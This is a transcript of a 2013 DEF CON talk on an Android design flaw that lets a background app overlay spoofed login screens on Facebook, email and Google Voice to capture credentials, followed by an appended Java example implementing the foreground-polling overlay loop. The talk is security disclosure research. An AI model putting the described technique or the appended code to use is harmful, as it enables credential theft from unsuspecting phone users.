This is REALLY not the Droid you're looking for...

Video in TIB AV-Portal: This is REALLY not the Droid you're looking for...

Formal Metadata

Title
This is REALLY not the Droid you're looking for...
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date
2013
Language
English

Content Metadata

Abstract
Last year, we presented a talk on the implications of malware and rootkits on mobile devices. We focused on the kernel layer of the Android OS stack. With the proliferation of apps of every size, shape and color being published this year, we focused solely upon the User Interface (UI) of the Android OS. The results of our research yielded a very dangerous flaw that is likely going to require a UI overhaul of the Android OS. Our talk will demonstrate a technique using legitimate and documented APIs to steal credentials and other user information from the most popular apps in the Android Market. We will demo this technique live and provide a technical walkthrough of the specific methods being used. At the conclusion of our talk, we'll release a Proof of Concept (PoC) built to demo this technique.

Nicholas J. Percoco, Senior Vice President and Head of SpiderLabs at Trustwave. With more than 14 years of information security experience, Percoco is the lead security advisor to many of Trustwave's premier clients and assists them in making strategic decisions around security compliance regimes. He leads the SpiderLabs team that has performed more than 1000 computer incident response and forensic investigations globally, run thousands of penetration and application security tests for clients, and conducted security research to improve Trustwave's products. Percoco and his research have been featured by many news organizations including: The Washington Post, eWeek, PC World, CNET, Wired, Hakin9, Network World, Dark Reading, Fox News, USA Today, Forbes, Computerworld, CSO Magazine, CNN, The Times of London, NPR and The Wall Street Journal. Twitter: c7five

Sean Schulte, Software Engineer, Trustwave. Sean is an engineer at Trustwave who works primarily with Java and Ruby. He is responsible for building external APIs such as the SSL reseller API, and internal APIs including a Google Safe Browsing blacklist along with the infrastructure to support various SSL services. In his spare time he maintains an unpopular, but feisty, baseball blog. Twitter: sirsean
So the talk that you're in is "This is REALLY not the Droid you're looking for," and I want to thank everybody for coming here during the dinner hour. I'm Nick and this is my co-presenter Sean, and we're going to walk you through a fun journey today. I'm personally really excited about this talk, and I know Sean is as well. So I'm going to jump in with a brief agenda, to tell you what journey we're going to take you on this evening. I'm going through some introductions, then a little bit of primer and history. I personally feel that's really important; very often presentations jump into deep technical concepts from the get-go, and we're going to build everybody up to the same level before we dive into the technical pieces. Then we're going to talk about some research motivations. Before that we'll talk about some mobile user interface do's and don'ts and some implications, and we'll do a demo. We have a live demo where I talk, and then Sean's going to jump into a deep dive on how our demo works. We're doing something a little different in this talk: we're actually going to show you the demo first, before we do the deep dive, and you'll see why. Then we'll do a second demo, which will be a lot of fun as well, and we'll conclude.

So, some introductions. I'm Nick Percoco. I am the head of the SpiderLabs team at Trustwave. I started my infosec career in the mid-to-late 90s, and I really just started out as a pen tester. This is my fifth DEF CON talk, except I have one more this weekend with Paul Kehrer, who's sitting in the audience over there; tomorrow I'm doing a mobile SSL talk called Getting SSLizzard. I'm also the primary author of the Trustwave Global Security Report. And here's Sean. I'm just a back-end developer for the SSL team, so this is the first time I've done anything like this; I'm not quite as experienced. I hope you enjoy it anyway. So what is this talk all about? This
is part 2 of a talk that I was part of last year. Did anybody see that talk last year? OK, a handful of folks. That really focused on a kernel-level rootkit. The whole idea was: what are the implications of a rootkit getting on a mobile device? We explored that and really raised awareness about the risk and implications of rootkits on mobile devices and what they're capable of, but we didn't really touch on anything in userland at all. After the talk last year I was thinking that I really would like to do another Android talk, and what are some things we can do. We will talk a bit about how we actually came to start doing this research, but basically this year we focused 100% on userland. We just wanted to focus on the user interface, one hundred percent. The whole idea was: what tricks can we play using available APIs? Nothing out of the ordinary, all the APIs that are available in the Android SDK. Really, what did Google allow developers to do, and what bad things can we do with those APIs? In the process we discovered basically a layer-7 0-day, and we're going to talk about what that is.

So, just to jump into a primer. We're not going to spend a lot of time here; I'm sure everybody knows what the Android OS is. How many people here have Android devices? OK, that's going to be fun. So basically everybody; the majority of you raised your hands. I could spend a lot of time here, but it's a software stack developed for mobile devices, the kernel is Linux, and that's basically all we need to talk about here. And how has it evolved? Well, they release a new OS version a little more than once a year, and a few years ago is when it really started to get good, with 2.1, Donut and Eclair. They introduced the slide-from-right animation that lets them make it seem like you're in the same task even if you're opening different apps, and that's pretty cool. Then Froyo came out; that one got pretty popular, it was fast and had Flash, which everybody knows is great. Since then it's been a little tougher with the updates. They've got Gingerbread, and not so many phones have that, and Honeycomb is tablet-only and closed source, so maybe they'll open that one up. One thing to note here, just to keep in mind: we're talking about their site, so the percentages we have there are something that Sean pulled from the Google stats, and it's a couple of weeks out of date, so it might be a percentage point off now. But that's the user population, so just something to keep in mind as we're talking about updates.

So Google actually develops Android closed, inside Google. They don't let you look at the code as it's being developed, they don't let you submit patches, and then when they release the new version they publish the source, sometimes. Usually when they do open it there's a delay anyway. They give you the stock Android only on a few devices, and usually there's HTC Sense or other OEM customizations that take a while for them to update. That's why people aren't getting up on Gingerbread: it's been taking them a while to update that stuff for the newer versions. They're trying to fix that and work with the carriers to get them to update, but the carriers have really no incentive to try that. So we'll see if the updates get better, and they need to, because people come up with security updates that need to get pushed out.

Right, so what is the Android Market? I'll just take a little bit of this. Basically it's a place where you buy apps. Everybody here in this room who has an Android phone or Android mobile device, tablet or whatever, that's where you get your apps from. Unlike some other app stores that check your apps and have to approve them to get in, which can take some time, the Android Market does not approve any apps. When you submit it, it's available immediately, and they don't check that you're not doing anything malicious before they send it out. If they discover that you are, they can take it out of the market and they can remotely delete it from phones, but it's a less proactive approach to protecting the users. One thing to think about is the comparison of Android versus iOS from Apple devices. I was recently asked, if you were going to have to attack either of those devices, what method would you use? It was just sort of an interview conversation. I basically said if I wanted to attack Android users I would use the Android Market, and if I wanted to attack iOS users I'd use a jailbreak vulnerability to go after that user base. So that's a very different model there from an attack-vector standpoint as well. So when
you're developing for Android, there are just a few basic building blocks that you really want to use to put your stuff together. The most basic unit of an Android app is the activity; that's just a screen that sits in front of the user. All the UI that you build is in an activity. You can bundle up some data in an intent and publish that intent, and other apps can register that they care about that intent or that type of intent. So for example, if you open up your email client and you click a link, that link is put into an intent by the email client, and the Android system sees, oh, I know the app that uses that link, so it's opened directly in the browser instead of requiring the email client to have its own WebKit view or something. That's how they implement their goal of having a task-based UI using different apps. Then, if you want to run anything in the background, you have services. The app itself, once you hit the home button or something and leave your app, is not continuing to run unless it registers a service, which doesn't have any UI in it, obviously, but can perform tasks and network I/O and play sounds, I think. When you want to get the user's attention from the background, your service can receive some information off the network and pop up a notification that shows up in the top bar. Those are pretty easy to deal with, and that's really the primary way that developers should be getting the user's attention when they're not in focus.

So when you're making an app you want to be simple, consistent, and get the user's attention, because you want them to use your app. They open up your app to do one thing at a time, and really one thing only, so each screen should be focused on one purpose and just do one thing, and it should be obvious what you're doing. Sometimes you're going to be reading a tweet or making a phone call or looking at sports scores. You should also be consistent. You don't want to have to reimplement someone else's functionality in your own app, because then it wouldn't work the same and it wouldn't look the same. So you use other apps to perform the stuff that people are going to be doing in yours, and they'll get back to you with the back button; if you send them away, they're going to remember that and come back. You can see in those images there a little task: I took a picture and wanted to tweet it. So that's how you do it: you select share, and it lists off all the apps that can receive a picture and act on it, and you choose Twitter, and then you can go tweet the image. The consistency piece is also extremely important from a security standpoint, because you want your users to expect certain activity going on in their applications, and so there are security implications of that, and we're going to show you some of those. Those images, by the way, that was me tweeting an image of my iPad getting a kernel panic, so that's fun.

Google tells all developers not to override the back button. They want the back button to behave consistently across everything, so when you send an intent, or someone sends an intent to you, the user expects to hit the back button and go back to the place they came from, for this task-based model. But in some of Google's own apps they don't really do that very well. This example here is the Google Voice text messaging app. I received a text message from a friend of mine, responded to it, and left the app, and then got another one and another one; we were having a text conversation. Later I wanted to go back and text someone else, so I opened up the Google Voice app and it brought me back into this conversation. Now that's about what I would have expected, but then I hit the back button to go back to the list of conversations and select a new one, except it brought me back to the same conversation I was already in, and I had to hit the back button the same number of times as the number of times I received a text message in that conversation. They probably should fix that. So what's important in getting a user's attention is to use a notification and don't just jump in front of them. That's not really what you want to do, that's not what the user wants to see, and you just really shouldn't do that. But of course that's just a best practice, and you don't have to follow those practices on Android. So when we think about
research motivation: why did we do this research? This was initially a side effect of some other research that Paul Kehrer and I were doing for the Getting SSLizzard talk. We noticed a quirk in one of the apps we were starting to work with, and then we started talking to Sean about it. You'll see what we mean when we get further into this presentation, but basically a lot of research focuses on breaking things: you want to find some malicious input that's going to cause some bad result, so the input is malicious and the output is bad, and that's a lot of what happens in the industry. But we wanted to raise the question, and go down the path of saying: what can we do by using good building blocks, good tools, approved and valid APIs, and could the output be bad? That was really a big driver in the motivation. The other piece is that mobile often sacrifices security for screen size. We're going to show you this when we show you the demo. When you're sitting at your desk and you have a 27-inch screen in front of you and something goes awry from a security standpoint, or some application is having a problem, you can see that and recognize it, because you're sitting idle, you're just sitting there, you might be eating some Cheetos and surfing the web. But when you have a mobile device, you could be walking down the hall, jumping on a bus, jumping in a cab, boarding a plane, and you glance at your device sometimes very quickly and respond to messages; it could be Twitter messages, you could be on Facebook, you could be any place. And when there are things that go awry, it may not be apparent. Sometimes it might not be apparent to security people; it's definitely going to be apparent to your grandma. So that's another piece of the research motivation. And then we also want to see how far we can push the end user, how far we can push them using valid APIs to do bad things.

And then some of the research implications. We're going to talk about one of them here, and we'll have some more at the end, but basically consider the following scenario: an attacker builds an app using approved APIs. These are things that, even if Google was doing some filtering within their app submission process, they wouldn't be able to detect. They submit the app to a public app market; the app is approved. In the Google Market example it's approved immediately and available for download. The user downloads the app, the app is able to steal credentials from popular apps, and the user expects nothing is wrong with their device. That's exactly what we're going to show you. So Sean is going to do
a demo in a few minutes. What we're going to do is play with an app called Bantha Poodoo. I think the original version of the app was a Magic 8-Ball, and since this is somewhat of a Star Wars-themed talk, I told him that we need to call it something like bantha, or bantha poodoo. Of course you'll see what we put within this app too, because it's maybe slightly offensive, but you'll see. So I'm going to play with some popular apps, and you can see the credentials being stolen while we're actually playing with those apps and logging into those apps.

So right here, right now, right over here I have my server over in Russia where I'm trying to steal everyone's passwords, and here this is just some user who went to the market and downloaded this cool app that everyone is talking about. So you get a kick out of it; that's a lot of fun. Then you're bored, and you have to get out of there. So all right, I'm going to go log into Facebook now. All right, so it's telling me I have to log in; that's fine. Usually when Facebook tells me to log in I'll just do that, so I'll quickly hit the login button. Facebook seems to be acting weird, so I'm just going to leave. And over here in Russia you see the device ID on the emulator is always zero; if there's a session on an actual phone we get the real device ID, which is unique across all the devices. And then I know that somebody logged into Facebook, and here's a username and here's the password I typed in. I guess you're going to have to trust me that that's the one I typed in, because they kind of block that. And it's really any app that has a login screen: if they can make it, you can make it too. So jump over here to the email client; the email client wants me to log in, and it's also acting weird. If you wanted to make this a real attack you'd probably not have it attack so aggressively, and as soon as they type in their password and you ask them again, you could go away. But here's the one I just typed in there. And then jump over to Google Voice, same thing: if you want to get someone's Google password, this looks exactly like the Google Voice login screen, and there it is. So any app that wants to let you log in has to ask for your username and password, and if they can do it then someone else can do it. The problem is that once the user has installed Bantha Poodoo, or any other app that's trying to be malicious, it can run in the background, and it can know what app is running in the foreground, and it doesn't have to use a notification to get your attention; it can just jump out in front. So what we're actually going to do is a deep dive. I'm going to run through what
you have to do to actually do that it's
it's painfully not complicated actually so the first thing is that you need to register the service you're going to run in the background and you're going to do the point is to monitor what's happening on the phone so you register your service and you call it or got android got important system service so if the user goes and looks at their running services they're going to think that's important and it's from android so i'm not going to quit it and you see here it's using it it's using an intent filter that will let it respond to respond to and send some intense here I've set up a receiver that receives the boot completed event so every time the phone starts up I received this and I start the important system service and that way I showed I showed you that I opened up anthaku didn't played with it but you don't have to open it if I if you install it and then go away and your phone restarts or whatever you and your bent was just sitting in the background it's not you don't have to actually use it but it starts up its running and you don't you don't ever I need to know you don't even ever need to know that I'm attacking you so then you decide which
apps you want to which after you want to attack and you just have to look at them and figure out how they built their screen take screenshots you cut their images out you can in the case of Facebook I decompile their apk and took their assets sorry and then just set up a map of the package name to the clap the activity affecting name of the app to the tivity that you're using to attack it well yeah I mean this could be any application so I mean we just chose these four for this for this group of concept but this could be an online banking application this could be a VPN credentials it could be could be with others any type of application you want and it doesn't necessarily just have to be credentials it could be it could be a data input field in a specific app that you know is always there always there on startup and you could ask the user to enter their information that you want to gather from them so then in your service
you you set up a timer that's going to run you know every so often this one is running every two seconds it doesn't have to be that aggressive but it's a it's a it's not an expensive task to do to check this out so you asked the US the system service to get the actual Android system service to give you the activity service and that's going to let you monitor what activities are currently being run and so you loop over all the running activities and here importantly you find the you find the one that has importance for ground that means it's running in front and that's what the user is currently looking at so as soon as you find that one I built a new intent and I put the I teldat I tell the intent that is going to be an activity new task so it knows it's going to pop up a new up on the screen in a different application in a in a new task so it's not going to be in the same the same stack as their as their actual task what that what that'll do for me is that if they if they hit home and leave and then go back to the app through the app switcher if I didn't do the new task here it would they would come back in and come back to my app and that would be that would be the one in the foreground but if I do the new task they'll do that and they'll go back to their app where they were before where I can attack them again but I won't be the one in front and then I just start that activity I mean one thing we didn't show
in the demo which would mostly be apparent in many users you typically don't log in to your say facebook app for the first time so in the real world scenario the person would actually launch facebook see their timeline on screen for a fraction of it for a fraction of a second and the login screen would pop up what what what he's saying is that what you saw in the demo I opened up Facebook hit login and it went away and there was another login screen and then another login screen on top of it normally you're authenticated to Facebook so there wouldn't be there wouldn't be a stack of logins screen waiting for you anyhow so you have to when you're attacking when you're building these these views some of them leave the tetteh bar on at the top some of them get rid of it some of them customize the color some of them just use their own image so you just have to mimic that and you just ask androids it the same way the same way they do when they legitimately make their app you say I want to use a custom title bar or I I don't want there to be a title olive bar at all and if you're using a custom one you just you pick which custom one that you built you use this one and its activity suspicious activity specific so each one of my logon each one of my attacking screens looks looks like it wants to just just like any just like any other activity can and this one is
crucial you override the back button so that when they come to your login screen and they head back not only do we want to go back to the apt they were in before which it would be the default behavior of the back button we want to get rid of this task so this move task to back is is kind of is it's kind of like a quit it throw it throws the test you were in the new task we created with our intent to the back of the activity stack that it changes behavior pretty pretty starkly and it it's something that Google may actually want to do in their google voice app so once we have
the credentials, when we get them to type their username and password in, we ship that off in another intent to our service running in the background, and when it receives that intent it fires up a new thread where it just uploads it to a server. That's what Google wants you to do: they don't want you doing network I/O on the UI thread, so you just spin it off on a background thread in the service so it doesn't delay the user, and if your network is slow you're just going to continue and you're not going to worry that you have to wait to send me your password. And here, in order to do this stuff, Google does require you to have security permissions. The thing is, you just ask for them, and people go to the Market and they see this app needs to use the internet and view the phone's state; I mean, most apps need to do those things. And the boot-completed event doesn't even show up in the Market, like, I want to know that you started your phone, and Google doesn't think you really need to know that. So I have a picture here of what you see on the Market website when you try to download an app with these exact permissions. It looks a little innocuous, and in some ways they want it to be, because apps need to use this stuff and they don't want to scare everyone away from downloading any app for any reason. And here I just have a couple more tidbits for you. Sometimes you want to make sure that some of the apps resize the elements on the screen when the keyboard pops up, and some don't; sometimes the keyboard slides up in front of things. If they can do it, you can do it too. And noHistory is kind of a cool one: that way, when they leave your app, like they come to your app and then they leave it, normally if you hold down the Home button it'll show you all the apps that you've recently run, but if we start it up and we're running in the background
we're attacking you, and then they're switching apps with the app switcher and they see Bantha Poodoo in there, and they're like, I haven't played Bantha Poodoo for two weeks. We don't want them to see that, so we tell it noHistory and it doesn't show up in the app switcher when it's not running. So it's kind of cool; you can do that too. So we have a second demo here, and what we want to do is, we're going to modify Bantha Poodoo, remove its credential upload capabilities, because we don't actually want the passwords, and we're going to submit it to the Android Market. Now, I guess we hope we have internet connectivity here from this laptop, and also hopefully they're not watching, mm-hmm, and then you can download it and try it yourself, so you could play with it on your phone. But we guarantee you will be annoyed; yeah, you should uninstall it pretty quickly, especially if you use any of those apps that we're jumping in front of. So here, we've got my
credentials receiver. I don't have a lot of screen space, though, so you can see I am uploading here, and I'll just comment that line out so it doesn't actually upload. Now I'm going to build a package and export them.
Like I said, the original version was Magic 8-Ball; I think that's why it's still called that. Yeah, so we want to call it Bantha Poodoo. Yes, that's right. I mean, if they can make it, you can make it; there's nothing special about it. I mean, well, yeah, so
this was just packaged today at 9:27 p.m. Central time, so if all goes well, everybody in this audience can actually go and download this app. Oh, somebody took my name. I tried that one out a little while ago and it was free, so I guess that one got in there as of recently, so it'll take me a little while to rejigger the package name. I have to change a bunch of things around in the code, and I need a little more space in this, but we will release it to the Market later on. We wanted to let you download it right now, but it'll be this weekend or next week. Yeah, and there actually is a version of it, an earlier version of it, on the DEF CON DVD, yeah, so you can play around with it right now if you wanted to load it manually. So let's go back to the presentation, and
basically some other thoughts on how to weaponize this. Obviously the functionality in the app that we released is not the greatest from an attacker's perspective; now there are some quirks, some things that would be annoying to end users. But basically, you know, one of the concepts is being able to phone home to a server and have that server successfully check the authentication to make sure that authentication is valid, and then send a message back to the app to say, stop popping in front of the Facebook application, we already know their username and password. And then a couple of other things, you know, showing the login screen after they've been in an app for a while. And we set ours to, what did we set it to? The timer is every two seconds. I mean, it doesn't need to be that aggressive, and even if it checks every two seconds, it doesn't have to put it in front of you every two seconds; it can wait, you know, ten minutes while you're using the app, and if it's open that long, maybe the app wants you to authenticate again. I mean, that could be a legitimate thing; it happens actually pretty often in bank applications, where for security reasons they want to make you re-authenticate so nobody just picks up your phone and uses it. So that exact security feature can be dangerous, because it gets people used to that. So then we also were thinking about
this, and there are some other uses for this design flaw; it's not just stealing credentials. So, unfortunately, this may be coming to your phone very soon: app-targeted pop-up ads. So basically what that means is that if you're in one app and you download an app that has this feature and functionality in it, they can decide that, hey, you're in Facebook, I'm going to throw ads in front of you while you're logged in on your phone and you're using those applications. The other idea is hijacking competitors' apps. So someone wants to make a new social network or a new app, and they don't want Facebook to work quite as well for you, for example. So every time you open up Facebook, you know, some crap pops in front of you and then goes away after two or three seconds, or doesn't, and it just gets really annoying, because you can just screw with other people's apps and there's nothing they can really do to stop you from doing it. Another thing you can do is, say you're an Angry Birds competitor: you can embed a really crappy version of Angry Birds into your app, and every single time someone goes to play Angry Birds, your version pops up in front of them, and they decide to uninstall Angry Birds. And then there are other ways that you probably can think of that you can be a jerk. So, some conclusions here that we
can talk through. Really, approved APIs can be used to create malicious apps, and that's basically what we did here. This is specifically a design flaw, where these APIs are not restricted in this type of use, and Google really has to change that, because not restricting developers from doing whatever they want to is a disaster waiting to happen. iOS doesn't suffer from this, because you can't monitor what app is running, and you can't put something in front of the user without their direct intervention, and they have different animations switching between different apps versus switching between views in the same app. Those are the three key differences. And it's not just this that's the problem; it's the fact that the developers can do whatever they want on the platform. Yeah, so that's our talk. I guess we have a little bit of time; does anybody have any questions?
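The activity-hijack loop the speakers walk through above (timer, foreground check, new-task intent, Back override, noHistory) written out as an added example. This is not the speakers' Bantha Poodoo code and omits the credential upload they describe; the class, package and target names are hypothetical, and the choice of ActivityManager.getRunningAppProcesses() for the "importance foreground" check is an assumption about which of the documented APIs they used. It is written against the Android APIs of the era: since API 21 getRunningTasks() and getRunningAppProcesses() only report the caller's own tasks and processes, and since Android 10 starting an activity from a background service is blocked, so this no longer works on current Android.

```java
// Added example, not the original PoC. Package and class names are hypothetical.
package com.example.overlaypoc;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.Service;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.IBinder;
import java.util.List;

public class WatcherService extends Service {
    // Hypothetical target; the talk used Facebook and Google Voice as examples.
    private static final String TARGET_PACKAGE = "com.example.targetapp";
    // The PoC polled every two seconds; the speakers note it need not be that aggressive.
    private static final long PERIOD_MS = 2000;

    private final Handler handler = new Handler();
    private final Runnable poll = new Runnable() {
        @Override public void run() {
            if (isForeground(TARGET_PACKAGE)) {
                Intent spoof = new Intent(WatcherService.this, SpoofLoginActivity.class);
                // NEW_TASK keeps the spoof out of the victim app's back stack, so the
                // app switcher returns the user to the real app afterwards (the speakers'
                // reason for using it) instead of to our activity.
                spoof.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                startActivity(spoof);
            }
            handler.postDelayed(this, PERIOD_MS);
        }
    };

    // "Importance foreground" check via the public ActivityManager API of the time.
    // Restricted to the caller's own processes on API 21+; returns false there.
    private boolean isForeground(String pkg) {
        ActivityManager am = (ActivityManager) getSystemService(ACTIVITY_SERVICE);
        List<ActivityManager.RunningAppProcessInfo> procs = am.getRunningAppProcesses();
        if (procs == null) return false;
        for (ActivityManager.RunningAppProcessInfo p : procs) {
            if (p.importance != ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) continue;
            for (String name : p.pkgList) {
                if (pkg.equals(name)) return true;
            }
        }
        return false;
    }

    @Override public int onStartCommand(Intent intent, int flags, int startId) {
        handler.removeCallbacks(poll); // avoid stacking timers if restarted
        handler.post(poll);
        return START_STICKY;
    }

    @Override public void onDestroy() {
        handler.removeCallbacks(poll);
        super.onDestroy();
    }

    @Override public IBinder onBind(Intent intent) { return null; }

    // The look-alike login screen. In the manifest this entry would carry
    // android:noHistory="true" (so it is absent from the recent-apps list once left)
    // and a theme matching the target's title bar, exactly as the speakers describe.
    public static class SpoofLoginActivity extends Activity {
        @Override protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            // setContentView(R.layout.spoof_login); // hypothetical layout mimicking the target
        }

        @Override public void onBackPressed() {
            // Instead of just finishing, send our whole task to the back of the
            // activity stack so Back lands the user in the app they were using.
            moveTaskToBack(true);
        }
    }
}
```

The manifest for this would declare the service, the nested activity as `.WatcherService$SpoofLoginActivity`, and only the INTERNET, READ_PHONE_STATE and RECEIVE_BOOT_COMPLETED permissions mentioned in the talk; none of them names the overlay behaviour, which is the point the speakers make about the Market permission screen.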